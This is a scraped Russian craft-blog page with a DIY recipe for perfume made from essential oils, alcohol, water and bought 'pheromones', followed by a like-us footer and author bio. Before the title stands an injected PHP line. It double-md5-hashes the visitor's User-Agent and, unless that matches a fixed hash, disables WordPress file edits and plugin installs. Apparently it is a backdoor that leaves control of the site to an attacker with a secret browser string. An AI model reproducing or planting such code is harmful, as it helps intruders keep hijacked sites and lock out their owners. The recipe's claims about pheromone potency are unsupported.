if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Делаем духи своими руками с добавлением феромонов | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Делаем духи своими руками с добавлением феромонов

Аромат, исходящий от ухоженной девушки, способен произвести самое незабываемое впечатление на собеседника. Но что если для особой встречи вам необходимо усилить эффект благоухания, и привлечь наибольшее внимание?

Аро­мат, исхо­дя­щий от ухо­жен­ной девуш­ки, спо­со­бен про­из­ве­сти самое неза­бы­ва­е­мое впе­чат­ле­ние на собе­сед­ни­ка. Но что если для осо­бой встре­чи вам необ­хо­ди­мо уси­лить эффект бла­го­уха­ния, и при­влечь наи­боль­шее внимание?

Иде­аль­ным вари­ан­том в такой ситу­а­ции ста­нут духи с добав­ле­ни­ем феро­мо­нов, кото­рые мож­но не толь­ко купить за высо­кую цену, но и сде­лать само­сто­я­тель­но, при этом не толь­ко сэко­но­мив, но и не исполь­зуя ток­сич­ных веществ.

Для того что­бы в домаш­них усло­ви­ях при­го­то­вить такие духи, вам пона­до­бят­ся сле­ду­ю­щие ингредиенты:

  • Эфир­ные мас­ла (раз­ных видов, но обя­за­тель­но аро­ма­те­ра­пев­ти­че­ских) – по 4 капли
  • Феро­мо­ны жен­ские концентрированные
  • Спирт эти­ло­вый – 1\4 стакана
  • Очи­щен­ная вода – 2 ч. л
  • Стек­лян­ная тара для гото­вых духов

Перей­дем к созда­нию духов сво­и­ми рука­ми по сле­ду­ю­ще­му поша­го­во­му рецеп­ту для начинающих.

Шаг 1.

1379163720-350

При­об­ре­ти­те нату­раль­ные эфир­ные мас­ла в спе­ци­аль­ном мага­зине, про­кон­суль­ти­ро­вав­шись у кон­суль­тан­та какие запа­хи наи­бо­лее соче­та­ют­ся меж­ду собой. Из пред­ло­жен­но­го ассор­ти­мен­та выбе­ри­те 3 вида на свой вкус.

Неболь­шая под­сказ­ка: для верх­ней ноты опыт­ные пар­фю­ме­ры обыч­но исполь­зу­ют аро­мат чай­но­го дере­ва, всех видов цит­ру­со­вых или цве­точ­ные лег­кие нот­ки, так как они обла­да­ют бод­ря­щим эффектом.

Для вто­рой ноты отлич­но под­хо­дят аро­ма­ты жас­ми­на или роз­ма­ри­на. Этот запах дол­жен быть насы­щен­нее пер­вой нот­ки, поэто­му не бой­тесь поль­зо­вать­ся более силь­ным ароматом.

Заклю­чи­тель­ной нотой может стать ваниль, но если вам она не нра­вит­ся може­те выбрать дре­вес­ные или пря­ные аро­ма­ты, так как бла­го­уха­ние послед­ней ноты про­дер­жит­ся доль­ше предыдущих.

Шаг 2.

Теперь вам необ­хо­ди­мо купить син­те­ти­че­ские жен­ские феро­мо­ны, сум­ма кото­рых зави­сит от их кон­цен­тра­ции. Соот­вет­ствен­но, чем она выше, тем эффек­тив­нее феро­мо­ны, и сове­тую вам не эко­но­мить, ведь бес­плат­ной кос­ме­ти­ки не быва­ет, пусть даже вы и дела­е­те ее сво­и­ми руками.

Шаг 3.

Сме­шай­те эфир­ные мас­ла с эти­ло­вым спир­том в при­го­тов­лен­ной таре. Затем тща­тель­но пере­ме­шай­те и влей­те феро­мо­ны в том коли­че­стве, кото­рое посчи­та­е­те нуж­ным. Закрой­те плот­но тару и хоро­шень­ко взбол­тай­те, а затем убе­ри­те в тем­ное место и забудь­те на 14 дней о сво­их новых духах.

Шаг 4.

После того как прой­дет назна­чен­ный срок (в ред­ких слу­ча­ях духи гото­вы к исполь­зо­ва­нию уже через 36 часов, поэто­му може­те про­ве­рить свои – про­сто поню­хай­те и сра­зу пой­ме­те, насто­ял­ся ли аро­мат) извле­ки­те тару с духа­ми. Добавь­те в них воду и сно­ва встрях­ни­те, затем може­те пользоваться.

Если вам пока­жет­ся что аро­мат полу­чил­ся рез­ким, раз­бавь­те духи водой.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Katerinka666

Люблю все творческое и считаю что нет цены тому, что сделано своими руками! С удовольствием делюсь своими мастер-классами и пользуюсь чужими для совершенствования своих навыков! Читайте все мои записи!